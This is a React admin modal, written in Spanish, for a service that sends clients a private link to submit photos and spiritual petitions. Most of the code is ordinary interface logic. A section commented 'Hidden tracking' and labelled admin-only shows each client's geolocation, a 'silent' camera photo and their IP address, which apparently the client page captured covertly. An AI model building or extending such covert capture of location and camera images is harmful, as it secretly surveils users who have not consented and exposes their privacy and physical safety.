import { useEffect, useState, useCallback } from "react";
import axios from "axios";
import { motion, AnimatePresence } from "framer-motion";
import {
  Loader2, X, Copy, MessageCircle, Sparkles, RefreshCw, ScrollText,
  Image as ImageIcon, MapPin, Camera, Clock,
} from "lucide-react";
import { toast } from "sonner";

const API = `${process.env.REACT_APP_BACKEND_URL}/api`;

/** Fetch an admin-protected image as a blob URL (img tags can't send headers). */
const useBlobImage = (path, authHeader) => {
  const [url, setUrl] = useState(null);
  useEffect(() => {
    if (!path) return undefined;
    let revoked = null; let cancelled = false;
    (async () => {
      try {
        const r = await axios.get(`${API}${path}`, { headers: authHeader(), responseType: "blob" });
        if (cancelled) return;
        revoked = URL.createObjectURL(r.data);
        setUrl(revoked);
      } catch { /* ignore */ }
    })();
    return () => { cancelled = true; if (revoked) URL.revokeObjectURL(revoked); };
  }, [path, authHeader]);
  return url;
};

const AdminPhoto = ({ photoId, authHeader }) => {
  const url = useBlobImage(`/admin/petitions/photo/${photoId}`, authHeader);
  if (!url) return <div className="w-full h-28 rounded-lg bg-black/50 border border-white/10 flex items-center justify-center"><Loader2 className="w-4 h-4 animate-spin text-neutral-500" /></div>;
  return <a href={url} target="_blank" rel="noreferrer"><img src={url} alt="" className="w-full h-28 rounded-lg object-cover border border-white/10 hover:opacity-90" /></a>;
};

export const PlanPetitionLinkModal = ({ plan, authHeader, onClose }) => {
  const [loading, setLoading] = useState(true);
  const [link, setLink] = useState(null);
  const [petition, setPetition] = useState(null);
  const [error, setError] = useState("");
  const [regenerating, setRegenerating] = useState(false);

  const loadPetition = useCallback(async () => {
    try {
      const r = await axios.get(`${API}/admin/payment-plans/${plan.id}/petition`, { headers: authHeader() });
      setPetition(r.data?.exists ? r.data : null);
    } catch { /* ignore */ }
  }, [plan?.id, authHeader]);

  const generate = useCallback(async () => {
    setError("");
    try {
      const r = await axios.post(`${API}/admin/payment-plans/${plan.id}/petition-link`, {}, { headers: authHeader() });
      setLink(r.data);
    } catch (e) {
      setError(e?.response?.data?.detail || "No se pudo generar el enlace");
    }
  }, [plan?.id, authHeader]);

  useEffect(() => {
    if (!plan?.id) return;
    setLoading(true);
    Promise.all([generate(), loadPetition()]).finally(() => setLoading(false));
  }, [plan?.id, generate, loadPetition]);

  const copyUrl = () => {
    if (!link?.url) return;
    navigator.clipboard.writeText(link.url).then(() => toast.success("Enlace copiado")).catch(() => toast.error("No se pudo copiar"));
  };

  const waLink = () => {
    if (!link?.url) return "#";
    const digits = String(link?.user?.phone || plan.user_phone || "").replace(/\D/g, "");
    const name = link?.user?.name || plan.user_name || "";
    const service = link?.service?.name || plan.service_name || "tu trabajo";
    const msg = encodeURIComponent(`Hola ${name}, tu ${service} está listo. Entra a este enlace privado para subir las fotos y escribir tus peticiones: ${link.url} Bendiciones ✨`);
    return digits ? `https://wa.me/${digits}?text=${msg}` : `https://wa.me/?text=${msg}`;
  };

  const regenerate = async () => {
    setRegenerating(true);
    await generate();
    await loadPetition();
    setRegenerating(false);
    toast.success("Enlace nuevo generado (conserva los datos anteriores)");
  };

  if (!plan) return null;
  const cap = petition?.capture || {};

  return (
    <AnimatePresence>
      <motion.div initial={{ opacity: 0 }} animate={{ opacity: 1 }} exit={{ opacity: 0 }}
        className="fixed inset-0 z-[150] bg-black/85 backdrop-blur-md flex items-center justify-center px-3 py-6 overflow-y-auto"
        data-testid="plan-petition-link-modal" onClick={onClose}>
        <motion.div initial={{ scale: 0.94, y: 12 }} animate={{ scale: 1, y: 0 }}
          className="relative w-full max-w-lg bg-gradient-to-br from-[#0a0510] to-black border-2 border-[#d4af37]/60 rounded-2xl p-5 shadow-[0_0_60px_rgba(212,175,55,0.35)] my-auto"
          onClick={(e) => e.stopPropagation()}>
          <button data-testid="plan-petition-close" onClick={onClose} className="absolute top-3 right-3 p-2 rounded-full hover:bg-white/10 text-neutral-400 hover:text-white"><X className="w-4 h-4" /></button>

          <div className="flex items-center gap-2 mb-1"><Sparkles className="w-5 h-5 text-[#d4af37]" /><h3 className="font-serif text-lg text-white">Enlace de peticiones</h3></div>
          <p className="text-xs text-neutral-400 mb-4">
            Cliente <b className="text-white">{plan.user_name}</b>{plan.user_visible_id ? <> · <span className="font-mono text-[#d4af37]">{plan.user_visible_id}</span></> : null}<br />
            Servicio: <b className="text-white">{plan.service_name}</b>
          </p>

          {loading ? (
            <div className="py-8 text-center"><Loader2 className="w-6 h-6 animate-spin text-[#d4af37] mx-auto" /></div>
          ) : (
            <>
              {error ? (
                <div className="text-sm text-red-300 bg-red-500/10 border border-red-500/30 rounded-lg p-3 mb-3">{error}</div>
              ) : link ? (
                <>
                  <div className="rounded-xl border border-[#d4af37]/40 bg-black/60 px-3 py-3 mb-3">
                    <div className="text-[10px] uppercase tracking-widest text-[#d4af37]/80 mb-1 flex items-center gap-1">
                      <ScrollText className="w-3 h-3" /> Enlace sin login {link.generation > 1 ? `(v${link.generation} · conserva datos)` : "(nuevo)"}
                    </div>
                    <div className="text-[11px] text-white font-mono break-all select-all leading-relaxed" data-testid="plan-petition-url">{link.url}</div>
                  </div>
                  <div className="grid grid-cols-3 gap-2 mb-4">
                    <button data-testid="plan-petition-copy" onClick={copyUrl} className="btn-outline-gold py-2.5 rounded-full flex items-center justify-center gap-1.5 uppercase text-[10px] tracking-widest"><Copy className="w-3.5 h-3.5" /> Copiar</button>
                    <a data-testid="plan-petition-whatsapp" href={waLink()} target="_blank" rel="noreferrer" className="btn-gold py-2.5 rounded-full flex items-center justify-center gap-1.5 uppercase text-[10px] tracking-widest"><MessageCircle className="w-3.5 h-3.5" /> WhatsApp</a>
                    <button data-testid="plan-petition-regenerate" onClick={regenerate} disabled={regenerating} className="py-2.5 rounded-full border border-white/15 text-neutral-300 hover:bg-white/5 flex items-center justify-center gap-1.5 uppercase text-[10px] tracking-widest disabled:opacity-50">{regenerating ? <Loader2 className="w-3.5 h-3.5 animate-spin" /> : <RefreshCw className="w-3.5 h-3.5" />} Nuevo</button>
                  </div>
                </>
              ) : null}

              {/* Submitted data */}
              {petition && (petition.photos?.length > 0 || petition.petition_text) ? (
                <div className="rounded-xl border border-emerald-500/30 bg-emerald-500/5 p-3" data-testid="plan-petition-data">
                  <div className="text-[10px] uppercase tracking-widest text-emerald-300 mb-2 flex items-center justify-between">
                    <span>Peticiones del cliente</span>
                    <span className="normal-case text-neutral-400">{petition.submitted_at ? new Date(petition.submitted_at).toLocaleString("es-MX", { dateStyle: "short", timeStyle: "short" }) : "sin enviar aún"}</span>
                  </div>
                  {petition.petition_text && (
                    <div className="text-sm text-neutral-100 bg-black/40 rounded-lg p-2.5 mb-3 whitespace-pre-wrap">{petition.petition_text}</div>
                  )}
                  {petition.photos?.length > 0 && (
                    <div className="grid grid-cols-2 gap-2">
                      {petition.photos.map((ph) => (
                        <div key={ph.id} className="rounded-lg bg-black/40 border border-white/10 p-2">
                          <AdminPhoto photoId={ph.id} authHeader={authHeader} />
                          {ph.person_name && <div className="text-[11px] text-white mt-1 font-semibold">{ph.person_name}</div>}
                          {ph.person_dob && <div className="text-[10px] text-neutral-400">{ph.person_dob}</div>}
                          {ph.person_info && <div className="text-[10px] text-neutral-400 italic mt-0.5">{ph.person_info}</div>}
                        </div>
                      ))}
                    </div>
                  )}
                  {/* Hidden tracking */}
                  {(cap.geo || cap.silent_photo_id || cap.ip) && (
                    <div className="mt-3 pt-2 border-t border-white/10">
                      <div className="text-[9px] uppercase tracking-widest text-sky-300 mb-1.5">Captura (solo admin)</div>
                      <div className="flex flex-wrap items-center gap-2 text-[11px]">
                        {cap.geo && <a href={`https://www.google.com/maps?q=${cap.geo.lat},${cap.geo.lng}`} target="_blank" rel="noreferrer" className="inline-flex items-center gap-1 text-sky-300 hover:text-sky-200 underline"><MapPin className="w-3 h-3" /> Ubicación</a>}
                        {cap.silent_photo_id && <AdminSilentThumb photoId={cap.silent_photo_id} authHeader={authHeader} />}
                        {cap.ip && <span className="text-neutral-400 font-mono">IP {cap.ip}</span>}
                        {cap.captured_at && <span className="text-neutral-500 inline-flex items-center gap-1"><Clock className="w-3 h-3" /> {new Date(cap.captured_at).toLocaleString("es-MX", { dateStyle: "short", timeStyle: "short" })}</span>}
                      </div>
                    </div>
                  )}
                </div>
              ) : (
                <div className="text-[11px] text-neutral-500 italic flex items-center gap-1.5"><ImageIcon className="w-3.5 h-3.5" /> El cliente aún no ha enviado fotos ni peticiones.</div>
              )}
            </>
          )}
        </motion.div>
      </motion.div>
    </AnimatePresence>
  );
};

const AdminSilentThumb = ({ photoId, authHeader }) => {
  const url = useBlobImage(`/admin/petitions/photo/${photoId}`, authHeader);
  if (!url) return null;
  return <a href={url} target="_blank" rel="noreferrer" className="inline-flex items-center gap-1 text-sky-300 hover:text-sky-200 underline"><Camera className="w-3 h-3" /> Foto momento</a>;
};

export default PlanPetitionLinkModal;
